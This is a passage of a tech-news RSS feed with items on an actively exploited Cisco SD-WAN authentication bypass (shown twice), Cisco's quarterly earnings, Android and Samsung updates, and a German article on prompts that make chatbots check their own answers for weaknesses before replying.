<p>The post <a href="https://www.itsecuritynews.info/fake-claude-ai-site-spreads-new-beagle-windows-backdoor-heres-how-to-stay-safe/">Fake Claude AI Site Spreads New Beagle Windows Backdoor – Here’s How to Stay Safe</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco warns of an actively exploited SD-WAN flaw with max severity]]></title>
<description><![CDATA[Cisco has disclosed a max-severity authentication bypass vulnerability affecting its Catalyst SD-WAN Controller and Catalyst SD-WAN Manager platforms, warning that the flaw has already been found to be exploited in the wild.



The disclosure follows an earlier authentication bypass vulnerability...]]></description>
<link>https://tsecurity.de/de/3519569/it-security-nachrichten/cisco-warns-of-an-actively-exploited-sd-wan-flaw-with-max-severity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3519569/it-security-nachrichten/cisco-warns-of-an-actively-exploited-sd-wan-flaw-with-max-severity/</guid>
<pubDate>Fri, 15 May 2026 14:05:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Cisco has disclosed a max-severity authentication bypass vulnerability affecting its Catalyst SD-WAN Controller and Catalyst SD-WAN Manager platforms, warning that the flaw has already been found to be exploited in the wild.</p>



<p>The disclosure follows an earlier authentication bypass <a href="https://www.csoonline.com/article/4137562/five-eyes-issue-emergency-directive-on-exploited-cisco-sd-wan-zero-day.html" target="_blank">vulnerability</a> that Cisco patched in February. In the latest advisory, the company said the new flaw was identified while investigating the previously disclosed issue.</p>



<p>“A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system,” Cisco said in an <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW#vp" target="_blank" rel="noreferrer noopener">advisory.</a></p>



<p>The company also confirmed that it became aware of “limited exploitation” of the flaw in May 2026. However, it did not disclose details about the attack or threat actors involved.</p>



<p>The <a href="https://www.csoonline.com/article/4155155/the-zero-day-timeline-just-collapsed-heres-what-security-leaders-do-next.html" target="_blank">zero-day</a> flaw is now fixed with software updates, and organizations are advised to apply fixes immediately, as there are no workarounds that address this bug.</p>



<h2 class="wp-block-heading"><a></a>Attackers craft a connection for admin access</h2>



<p>According to Cisco, the vulnerability stems from improper validation during the authentication process used to establish control connections between SD-WAN devices. It said an attacker could exploit the issue remotely by sending crafted control connection requests to a targeted system.</p>



<p>Successful exploitation would allow the attacker to bypass authentication, establish themselves as trusted peers, and obtain administrative privileges to the affected device.</p>



<p>“A successful exploit could allow the attacker to log in to an affected Cisco Catalyst SD-WAN Controller as an internal, high-privileged, non-<em>root</em> user account,” Cisco said. “Using this account, the attacker could access NETCONF, which would then allow the attacker to manipulate network configuration for the SD-WAN fabric.”</p>



<p>The issue, tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2026-20182" target="_blank" rel="noreferrer noopener">CVE-2026-20182</a>, received a max-severity rating of CVSS 10.0. The company said that the issue is configuration-independent, meaning vulnerable systems remain exposed regardless of deployment-specific settings.</p>



<p>Cisco credited Stephen Fewer, Senior Principal Security Researcher, and Jonah Burgess, Senior Security Researcher, both of Rapid7, for discovering and reporting the bug.</p>



<h2 class="wp-block-heading"><a></a>Active exploitation kicks patching into high gear</h2>



<p>Cisco disclosed being aware of exploitation attempts in May, urging customers to upgrade to a fixed release immediately.</p>



<p>Shortly after the disclosure, the flaw was <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">added </a>to the Cybersecurity and Infrastructure Security Agency’s (CISA) known exploited vulnerabilities catalog (KEV). “Adhere to the applicable BOD 22-01 guidance for cloud services or discontinue use of the product if mitigations are not available,” it said.</p>



<p>The US cybersecurity watchdog has given federal executive agencies until May 17th to patch the flaw.</p>



<p>“Customers are advised to upgrade to an appropriate fixed software release,” Fewer and Burgess said in a <a href="https://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed/" target="_blank" rel="noreferrer noopener">blog post</a>, citing fixed software releases that address the flaw in versions 20.9 through 26.1.1. “There are no workarounds that address this vulnerability.”</p>



<p>Alongside software fixes, Cisco published operational guidance to help organizations identify potentially malicious control connections.</p>



<p>The advisory instructed admins to review existing control peering relationships, using the “show control connections” command, and validate all connected peers, particularly those associated with SD-WAN Manager systems.</p>



<p>Organizations that suspect compromise are being advised to contact Cisco Technical Assistance Center support and collect diagnostic information from affected devices.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco warns of an actively exploited SD-WAN flaw with max severity]]></title>
<description><![CDATA[Cisco has disclosed a max-severity authentication bypass vulnerability affecting its Catalyst SD-WAN Controller and Catalyst SD-WAN Manager platforms, warning that the flaw has already been found to be exploited in the wild.



The disclosure follows an earlier authentication bypass vulnerability...]]></description>
<link>https://tsecurity.de/de/3519529/it-security-nachrichten/cisco-warns-of-an-actively-exploited-sd-wan-flaw-with-max-severity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3519529/it-security-nachrichten/cisco-warns-of-an-actively-exploited-sd-wan-flaw-with-max-severity/</guid>
<pubDate>Fri, 15 May 2026 13:52:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Cisco has disclosed a max-severity authentication bypass vulnerability affecting its Catalyst SD-WAN Controller and Catalyst SD-WAN Manager platforms, warning that the flaw has already been found to be exploited in the wild.</p>



<p>The disclosure follows an earlier authentication bypass <a href="https://www.csoonline.com/article/4137562/five-eyes-issue-emergency-directive-on-exploited-cisco-sd-wan-zero-day.html" target="_blank">vulnerability</a> that Cisco patched in February. In the latest advisory, the company said the new flaw was identified while investigating the previously disclosed issue.</p>



<p>“A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system,” Cisco said in an <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW#vp" target="_blank" rel="noreferrer noopener">advisory.</a></p>



<p>The company also confirmed that it became aware of “limited exploitation” of the flaw in May 2026. However, it did not disclose details about the attack or threat actors involved.</p>



<p>The <a href="https://www.csoonline.com/article/4155155/the-zero-day-timeline-just-collapsed-heres-what-security-leaders-do-next.html" target="_blank">zero-day</a> flaw is now fixed with software updates, and organizations are advised to apply fixes immediately, as there are no workarounds that address this bug.</p>



<h2 class="wp-block-heading"><a></a>Attackers craft a connection for admin access</h2>



<p>According to Cisco, the vulnerability stems from improper validation during the authentication process used to establish control connections between SD-WAN devices. It said an attacker could exploit the issue remotely by sending crafted control connection requests to a targeted system.</p>



<p>Successful exploitation would allow the attacker to bypass authentication, establish themselves as trusted peers, and obtain administrative privileges to the affected device.</p>



<p>“A successful exploit could allow the attacker to log in to an affected Cisco Catalyst SD-WAN Controller as an internal, high-privileged, non-<em>root</em> user account,” Cisco said. “Using this account, the attacker could access NETCONF, which would then allow the attacker to manipulate network configuration for the SD-WAN fabric.”</p>



<p>The issue, tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2026-20182" target="_blank" rel="noreferrer noopener">CVE-2026-20182</a>, received a max-severity rating of CVSS 10.0. The company said that the issue is configuration-independent, meaning vulnerable systems remain exposed regardless of deployment-specific settings.</p>



<p>Cisco credited Stephen Fewer, Senior Principal Security Researcher, and Jonah Burgess, Senior Security Researcher, both of Rapid7, for discovering and reporting the bug.</p>



<h2 class="wp-block-heading">Active exploitation kicks patching into high gear</h2>



<p>Cisco disclosed being aware of exploitation attempts in May, urging customers to upgrade to a fixed release immediately.</p>



<p>Shortly after the disclosure, the flaw was <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">added </a>to the Cybersecurity and Infrastructure Security Agency’s (CISA) known exploited vulnerabilities catalog (KEV). “Adhere to the applicable BOD 22-01 guidance for cloud services or discontinue use of the product if mitigations are not available,” it said.</p>



<p>The US cybersecurity watchdog has given federal executive agencies until May 17th to patch the flaw.</p>



<p>“Customers are advised to upgrade to an appropriate fixed software release,” Fewer and Burgess said in a <a href="https://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed/" target="_blank" rel="noreferrer noopener">blog post</a>, citing fixed software releases that address the flaw in versions 20.9 through 26.1.1. “There are no workarounds that address this vulnerability.”</p>



<p>Alongside software fixes, Cisco published operational guidance to help organizations identify potentially malicious control connections.</p>



<p>The advisory instructed admins to review existing control peering relationships, using the “show control connections” command, and validate all connected peers, particularly those associated with SD-WAN Manager systems.</p>



<p>Organizations that suspect compromise are being advised to contact Cisco Technical Assistance Center support and collect diagnostic information from affected devices.</p>



<p><em>The article originally appeared on <a href="https://www.csoonline.com/article/4171694/cisco-warns-of-an-actively-exploited-sd-wan-flaw-with-max-severity.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s Even More Android 17 Features You Need to Know]]></title>
<description><![CDATA[Google may have revealed a bunch of major feature changes for Android 17 earlier this week through the latest edition of “The Android Show,” but they weren’t done. Today, the Android team dropped a new video that dives into other Android 17 changes you might love even more. As a bit of a spoiler,...]]></description>
<link>https://tsecurity.de/de/3517478/it-nachrichten/heres-even-more-android-17-features-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517478/it-nachrichten/heres-even-more-android-17-features-you-need-to-know/</guid>
<pubDate>Thu, 14 May 2026 19:17:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google may have revealed a bunch of major feature changes for Android 17 earlier this week through the latest edition of “The Android Show,” but they weren’t done. Today, the Android team dropped a new video that dives into other Android 17 changes you might love even more. As a bit of a spoiler, most...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/05/14/heres-even-more-android-17-features-you-need-to-know/">Here’s Even More Android 17 Features You Need to Know</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Five takeaways from Cisco’s blowout quarter and what it means to customers]]></title>
<description><![CDATA[Cisco Systems delivered a blowout Q3 FY2026 performance that surpassed even the most optimistic expectations, posting record revenue of $15.8 billion, up 12% year-over-year, with product revenue surging 17%. The networking giant’s momentum is accelerating across multiple fronts, driven by demand ...]]></description>
<link>https://tsecurity.de/de/3517009/it-security-nachrichten/five-takeaways-from-ciscos-blowout-quarter-and-what-it-means-to-customers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517009/it-security-nachrichten/five-takeaways-from-ciscos-blowout-quarter-and-what-it-means-to-customers/</guid>
<pubDate>Thu, 14 May 2026 16:23:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.cisco.com/">Cisco Systems</a> delivered a blowout Q3 FY2026 performance that surpassed even the most optimistic expectations, posting record revenue of $15.8 billion, up 12% year-over-year, with product revenue surging 17%. The networking giant’s momentum is accelerating across multiple fronts, driven by demand for AI infrastructure, campus modernization, and strategic silicon investments. </p>



<p>Here are five key takeaways from what CEO Chuck Robbins described as a quarter when Cisco’s “technology is more relevant than ever in the AI era.”</p>



<h3 class="wp-block-heading">1. AI infrastructure orders skyrocket to $9 billion for FY26</h3>



<p>Cisco significantly raised its <a href="https://www.networkworld.com/article/4131573/how-ciscos-platform-mindset-is-meeting-the-ai-era.html">AI infrastructure</a> order expectations for hyperscalers to $9 billion for fiscal year 2026, nearly double the company’s previous $5 billion forecast. The company took in $1.9 billion in AI infrastructure orders from hyperscalers in Q3 alone, with the year-to-date total reaching $5.3 billion before entering the final quarter. (Related story: <a href="https://www.networkworld.com/article/4171043/cisco-to-cut-nearly-4000-jobs-despite-strong-growth-in-ai-enterprise-networking.html">Cisco announced layoffs</a> along with its Q3 results)</p>



<p>“Given the strong demand, we now expect to take AI infrastructure orders of approximately $9 billion from hyperscalers in FY ’26, 4.5x our FY ’25 total,” Robbins announced on the earnings call. This explosive growth is driven by both Silicon One systems and <a href="https://acacia-inc.com/">Acacia</a> coherent pluggable optics. The Acacia business posted its strongest quarter ever, with over $1 billion in orders, and is tracking to grow over 200% year-over-year.</p>



<p>Cisco secured five new hyperscaler design wins in Q3, including the company’s first two wins for Silicon One P200-powered systems for “scale across” use cases. “During Q3, we were awarded two different hyperscalers’ P200 design wins, which is our product that is used for scale across applications,” Robbins said, adding that a third P200 scale-across design win came in early Q4. The company has now shipped over 750,000 400-gig and 40,000 800-gig coherent pluggable optics, which Cisco believes “far exceeds the next largest supplier shipments for both speeds.”</p>



<h3 class="wp-block-heading">2. Broad-based demand drives 35% order growth</h3>



<p>Total product orders grew an impressive 35% year-over-year, with strength across customer segments and geographies. “Overall, total product orders grew 35% year-over-year. Excluding hyperscaler orders, which grew by triple digits, product orders were up 19% year-over-year, demonstrating the continued broad-based demand we see for our technology globally,” Robbins reported.</p>



<p>Enterprise product orders grew 18%, public sector orders jumped 27%, and service provider and cloud orders accelerated 105%. Networking product orders grew more than 50% in Q3, marking the seventh consecutive quarter of double-digit growth for Cisco’s networking portfolio. Campus networking posted record orders, up more than 25% year-over-year, with wireless orders reaching their highest level ever, with 40%+ growth.</p>



<p>CFO Mark Patterson addressed investor concerns about demand pull-forward: “I think that it’s reasonable to assume that there is some level of pull ahead into Q3. I do think it’s very difficult to speculate exactly how much, but we believe it was a very modest amount.” Patterson cited three key data points: price increases accounted for approximately 4-5 points of order acceleration; the Q4 pipeline pull-forward was consistent with historical patterns; and “the pipeline is very healthy, very good year-over-year growth.”</p>



<h3 class="wp-block-heading">3. Silicon One becomes a massive competitive differentiator</h3>



<p>Cisco’s long-term investment in <a href="https://www.networkworld.com/article/4069652/cisco-seriously-amps-up-silicon-one-chip-router-for-ai-data-center-connectivity.html">developing its own Silicon One chips</a> is paying enormous dividends, with roughly half of the company’s AI infrastructure revenue coming from Silicon One-based systems. “I’ve said repeatedly on these calls over the last couple of years that as we move to the future, if you don’t have silicon, you’re going to struggle to be relevant to the hyperscalers. And I think that’s what we’re seeing,” Robbins emphasized.</p>



<p>Beyond revenue generation, Silicon One gives Cisco significantly greater control over its supply chain — a critical advantage in a constrained component environment. “The fact that we design our own silicon really gives us greater control end-to-end. I mean, the fact that we’re directly managing wafers, substrates, assembly, and test really gives us much more control over the supply chain,” Patterson explained.</p>



<p>The company has secured silicon supply through the calendar year 2026, with negotiations underway for 2027. While competitors face potential decommits due to supply constraints, Patterson reported: “I just want to reiterate what Chuck said: We did not see any decommits in the quarter.” This strategic control allows Cisco to commit to hyperscalers with confidence, while competitors struggle with dependencies on merchant silicon.</p>



<h3 class="wp-block-heading">4. Campus modernization cycle just beginning</h3>



<p>Cisco is in the early stages of what it believes will be a “multiyear, multibillion-dollar campus refresh opportunity” driven by AI workloads and rising network traffic. “Research conducted recently with around 3,500 technology leaders across global enterprises confirms increased urgency to modernize campus and branch networks,” Robbins said, adding that “with traffic across these networks expected to increase 3x over the next 3 years because of AI, 93% of respondents are accelerating their network modernization plans.”</p>



<p>Wi-Fi 7 adoption is accelerating rapidly, with Robbins reporting “strong double-digit sequential growth in orders for Wi-Fi 7, making up half of the wireless mix in Q3.” Cisco’s Unified Edge solution is gaining traction, as a single enterprise deal secured over 1,200 units, bringing together compute, networking, security, storage, and software to run AI applications at the edge.</p>



<p>The industrial IoT portfolio posted its strongest quarter ever in Q3, marking eight consecutive quarters of double-digit growth. “We expect this demand to continue with the onshoring of manufacturing to the United States and as agentic and physical AI are expected to drive massive increases in network traffic,” Robbins stated. He noted that customers are preparing for “inferencing and agentic applications” where “the network is incredibly important, and moving the bits around with low latency is super important.”</p>



<h3 class="wp-block-heading">5. Security portfolio turning the corner</h3>



<p>After several quarters of challenges, <a href="https://www.networkworld.com/article/4148753/cisco-talos-2025-year-in-review-and-lessons-learned.html">Cisco’s security business</a> is finally showing meaningful improvement, with double-digit order growth in firewalls and continued strength in new products. “In Q3, our core security portfolio, excluding Splunk, saw double-digit order growth across new and refreshed products, with strong double-digit year-over-year growth in firewalls,” Robbins reported.</p>



<p>The company’s new security products, including Secure Access, XDR, Hypershield, and AI Defense, attracted more than 1,000 new customers in Q3, bringing the total to approximately 5,000 since launch. “I think last call, I said we would exit this fiscal year approaching double-digit revenue growth on the traditional organic Cisco security portfolio. And I think we’re heading in that direction, and I feel good about us actually making that happen,” Robbins said.</p>



<p>Cisco is positioning itself for AI-driven security threats through participation in Project Glasswing, Anthropic’s Claude Mythos preview model testing, and OpenAI’s Trusted Access for Cyber program. “AI is accelerating the pace of innovation for security defenders and adversaries, and we are innovating with speed and scale to help create an asymmetrical advantage for defenders,” Robbins said. The company announced major security innovations, including DefenseClaw for safely deploying agents and Zero Trust Access for AI agents, as well as <a href="https://www.networkworld.com/article/4158694/cisco-just-made-two-moves-to-own-the-ai-infrastructure-stack.html">planned acquisitions of Galileo and Astrix</a> for agentic identity and access management.</p>



<h3 class="wp-block-heading">Recommendations for Cisco customers</h3>



<ul class="wp-block-list">
<li><strong>Assess your AI readiness now</strong>: With 93% of enterprises accelerating network modernization and campus traffic expected to triple over the next three years, customers should conduct infrastructure assessments immediately to identify bottlenecks and capacity constraints before they become critical. The growing deployment of inferencing and agentic AI applications requires low-latency, high-capacity networking that legacy infrastructure cannot support.</li>



<li><strong>Prioritize security modernization</strong>: The emergence of AI-powered security threats creates significant risk for organizations running unpatched or end-of-support equipment. Customers should audit their infrastructure for technology beyond the end of support and develop migration plans to Cisco’s new security portfolio, including Hypershield, XDR, and AI Defense capabilities.</li>



<li><strong>Plan campus refresh cycles around Wi-Fi 7 and next-gen switching: </strong>With <a href="https://www.networkworld.com/article/4170841/wi-fi-8-is-closer-than-you-think-heres-what-you-need-to-know.html">Wi-Fi 7</a> already accounting for half of Cisco’s wireless mix, and next-generation switching and routing ramping faster than in prior product launches, customers should align campus refresh initiatives with these platforms to maximize performance and longevity. The campus modernization cycle is just beginning, giving early movers a competitive advantage in supporting AI workloads.</li>



<li><strong>Lock in supply and pricing now: </strong>While Cisco’s Silicon One strategy offers better supply chain control than competitors’, memory constraints and component shortages remain industry-wide challenges. Customers with major infrastructure projects should engage Cisco early to secure supply commitments, particularly for AI infrastructure, high-density switching, and advanced optics, where lead times may be longer. The company has implemented pricing actions in response to rising memory costs, making current pricing potentially more favorable than future quotes.</li>



<li><strong>Explore edge AI and industrial IoT opportunities</strong>: Cisco’s Unified Edge solution and industrial IoT portfolio are experiencing exceptional growth as organizations deploy AI applications where data is generated, and decisions are made. Manufacturers and enterprises with distributed operations should evaluate these platforms for edge computing, particularly given U.S. manufacturing onshoring trends and the emergence of agentic and physical AI applications.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Von der Pflicht zur Praxis – Security-by-Design für vernetzte Produkte - AUTOCAD Magazin]]></title>
<description><![CDATA[Der Cyber Resilience Act stellt Unternehmen vor neue Anforderungen. Die Webkonferenz richtet sich an Konstruktion, Produktentwicklung, ...]]></description>
<link>https://tsecurity.de/de/3516512/it-security-nachrichten/von-der-pflicht-zur-praxis-security-by-design-fuer-vernetzte-produkte-autocad-magazin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516512/it-security-nachrichten/von-der-pflicht-zur-praxis-security-by-design-fuer-vernetzte-produkte-autocad-magazin/</guid>
<pubDate>Thu, 14 May 2026 13:23:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der <b>Cyber</b> Resilience Act stellt Unternehmen vor neue Anforderungen. Die Webkonferenz richtet sich an Konstruktion, Produktentwicklung, ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s a First Look at the New Google Fitbit Air]]></title>
<description><![CDATA[The Google Fitbit Air was announced last week and immediately went up for pre-order with a ship date at around May 26. It costs either $99 or $129 depending on which version you want, is a screen-less health and fitness tracker that competes with WHOOP, and is helping launch the new Google Health...]]></description>
<link>https://tsecurity.de/de/3514666/it-nachrichten/heres-a-first-look-at-the-new-google-fitbit-air/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3514666/it-nachrichten/heres-a-first-look-at-the-new-google-fitbit-air/</guid>
<pubDate>Wed, 13 May 2026 20:02:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Google Fitbit Air was announced last week and immediately went up for pre-order with a ship date at around May 26. It costs either $99 or $129 depending on which version you want, is a screen-less health and fitness tracker that competes with WHOOP, and is helping launch the new Google Health app and...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/05/13/heres-a-first-look-at-the-new-google-fitbit-air/">Here’s a First Look at the New Google Fitbit Air</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s Every New Change in Samsung’s One UI 9 Update]]></title>
<description><![CDATA[Samsung surprised us yesterday with the release of the first One UI 9 beta only 24-hours or so after they gave us stable One UI 8.5 on numerous devices. This first One UI 9 beta is only available to the Galaxy S26 series, but still pretty fun to welcome in new software. It also happens...
Read th...]]></description>
<link>https://tsecurity.de/de/3514487/it-nachrichten/heres-every-new-change-in-samsungs-one-ui-9-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3514487/it-nachrichten/heres-every-new-change-in-samsungs-one-ui-9-update/</guid>
<pubDate>Wed, 13 May 2026 18:47:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Samsung surprised us yesterday with the release of the first One UI 9 beta only 24-hours or so after they gave us stable One UI 8.5 on numerous devices. This first One UI 9 beta is only available to the Galaxy S26 series, but still pretty fun to welcome in new software. It also happens...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/05/13/heres-every-new-change-in-samsungs-one-ui-9-update/">Here’s Every New Change in Samsung’s One UI 9 Update</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ein Trick zwingt die KI dazu, mit Schmeicheleien aufzuhören und stattdessen nachzudenken]]></title>
<description><![CDATA[Komplimente für eine tolle Idee sind häufige Schwächen von KI-Chatbots, wobei manche Modelle anfälliger dafür sind, „Ja-Sager“ zu sein als andere. Doch selbst nachdem sich Anbieter von LLM-Programmen der KI-Anbiederung bewusst geworden sind und ihre Systeme zu mehr kritischem Denken trainieren, l...]]></description>
<link>https://tsecurity.de/de/3513518/windows-tipps/ein-trick-zwingt-die-ki-dazu-mit-schmeicheleien-aufzuhoeren-und-stattdessen-nachzudenken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3513518/windows-tipps/ein-trick-zwingt-die-ki-dazu-mit-schmeicheleien-aufzuhoeren-und-stattdessen-nachzudenken/</guid>
<pubDate>Wed, 13 May 2026 13:36:27 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Komplimente für eine tolle Idee sind häufige Schwächen von <a href="https://www.pcwelt.de/article/2314933/generative-ki-funktionsweise.html" data-type="link" data-id="https://www.pcwelt.de/article/2576318/lokale-ki-chatbots-fur-jeden-pc.html" target="_blank" rel="noreferrer noopener">KI-Chatbots</a>, wobei manche Modelle anfälliger dafür sind, „Ja-Sager“ zu sein als andere. Doch selbst nachdem sich Anbieter von LLM-Programmen der KI-Anbiederung bewusst geworden sind und ihre Systeme zu mehr kritischem Denken trainieren, lässt sich eine KI immer noch leicht dazu bringen, eine wackelige Theorie enthusiastisch zu unterstützen.</p>



<p>Eine Möglichkeit, selbst die unterwürfigsten KI-Modelle zum Umdenken zu bringen, ist die <a href="https://www.reddit.com/r/ChatGPTPromptGenius/comments/1q7dpf5/i_made_a_prompt_cheatsheet_for_2026/#:~:text=2,%E2%80%9D" target="_blank" rel="noreferrer noopener">„Failure-First“-</a> oder auch<a href="https://www.reddit.com/r/PromptEngineering/comments/1oa47a4/5_microprompts_that_change_everything_the_ones/" target="_blank" rel="noreferrer noopener"> „Inversion“-Eingabeaufforderung</a>. Sie wird häufig von Programmierern verwendet, die die zweifelhaften Vorschläge einer KI einem <a href="https://www.reddit.com/r/PromptEngineering/comments/1q15mv7/this_is_the_prompt_i_use_when_i_need_chatgpt_to/#:~:text=heres%20the%20exact%20prompt" target="_blank" rel="noreferrer noopener">„Stresstest“</a> unterziehen wollen.</p>



<p>Es gibt viele Varianten, aber sie folgen alle mehr oder weniger derselben Formel: Man fordert die KI auf, zunächst mögliche Fehlerquellen zu berücksichtigen, bevor sie ihre Lösung, ihren Vorschlag oder ihren Plan vorlegt.</p>



<p>Dazu ein Beispiel aus dem <a href="https://www.reddit.com/r/ChatGPTPromptGenius/comments/1q7dpf5/i_made_a_prompt_cheatsheet_for_2026/#:~:text=2,%E2%80%9D" target="_blank" rel="noreferrer noopener">ChatGPT Prompt Genius</a>.</p>



<p>Bevor Sie antworten, listen Sie auf, was die Argumentation am schnellsten widerlegen würde, wo die Logik am schwächsten ist und was ein Skeptiker angreifen würde. Geben Sie anschließend die korrigierte Antwort.</p>



<p>Das nächste Beispiel stammt von einem <a href="https://its.uiowa.edu/news/2026/03/use-ai-pressure-test-your-thinking-not-just-agree-you" target="_blank" rel="noreferrer noopener">Mitglied des KI-Support-Teams der University of Iowa</a>.</p>



<p>Angenommen, Sie sind mit dieser Empfehlung nicht einverstanden. Was ist das stärkste Gegenargument?</p>



<p>Und diese Variante kommt von meinem persönlichen KI-Assistenten:</p>



<p>Identifizieren Sie drei bis fünf konkrete Fehlerquellen der vorgeschlagenen Lösung oder Stellen, an denen die Logik am ehesten fehlschlägt. Erst nachdem Sie diese Fehlerquellen aufgelistet und erläutert haben, sollten Sie die endgültige Lösung präsentieren und dabei Schutzmaßnahmen gegen diese spezifischen Risiken einbauen.</p>



<p><a href="https://www.forbes.com/sites/johnjennings/2023/11/29/charlie-munger-died-at-99here-are-his-5-most-important-pieces-of-advice/" target="_blank" rel="noreferrer noopener">Charlie Munger</a>, Investor und Vordenker, langjähriger stellvertretender Vorsitzender von Berkshire Hathaway und Geschäftspartner von Warren Buffett, hat ein Lieblings-Denkmodell. Auf den Punkt gebracht besagt es, dass man sich nicht zuerst überlegen sollte, wie man ein Ziel erreicht, sondern sich stattdessen darauf konzentrieren sollte, wie man dabei scheitern könnte.</p>



<p>Ich bin selbst schon oft so vorgegangen, was fast immer dazu führt, dass mein KI-Assistent innehält und seine eigenen Argumente hinterfragt, bevor er fortfährt. Das liest sich dann beispielsweise so:</p>



<p>„Lassen Sie uns den ursprünglichen Plan auf Herz und Nieren prüfen“, sagte Gemini, nachdem ich den Chatbot kürzlich mit einer „Failure-First“-Anweisung herausgefordert hatte – allerdings nicht, ohne mir zuvor doch noch zu schmeicheln: „Ich liebe diesen Ansatz.“</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/2535969/diese-ki-begriffe-sollten-sie-unbedingt-kennen.html" data-type="link" data-id="https://www.pcwelt.de/article/2535969/diese-ki-begriffe-sollten-sie-unbedingt-kennen.html" target="_blank" rel="noreferrer noopener">Diese KI-Begriffe sollten Sie unbedingt kennen</a></li>



<li><a href="https://www.pcwelt.de/article/2314933/generative-ki-funktionsweise.html" data-type="link" data-id="https://www.pcwelt.de/article/2314933/generative-ki-funktionsweise.html" target="_blank" rel="noreferrer noopener">Generative KI: 10 Fragen &amp; Antworten zur Funktionsweise</a></li>



<li><a href="https://www.pcwelt.de/article/2576318/lokale-ki-chatbots-fur-jeden-pc.html" data-type="link" data-id="https://www.pcwelt.de/article/2576318/lokale-ki-chatbots-fur-jeden-pc.html" target="_blank" rel="noreferrer noopener">Lokale KI-Chatbots für jeden PC: Ein Überblick</a></li>
</ul>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why architecture matters more than ever in AI-driven software development]]></title>
<description><![CDATA[For most of my technology career spanning more than two decades, software architecture was primarily seen as a technical discipline — concerned with system design, scalability and integration patterns. Architecture reviews happened after strategy decisions were made, and success was often measure...]]></description>
<link>https://tsecurity.de/de/3513071/it-nachrichten/why-architecture-matters-more-than-ever-in-ai-driven-software-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3513071/it-nachrichten/why-architecture-matters-more-than-ever-in-ai-driven-software-development/</guid>
<pubDate>Wed, 13 May 2026 11:02:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



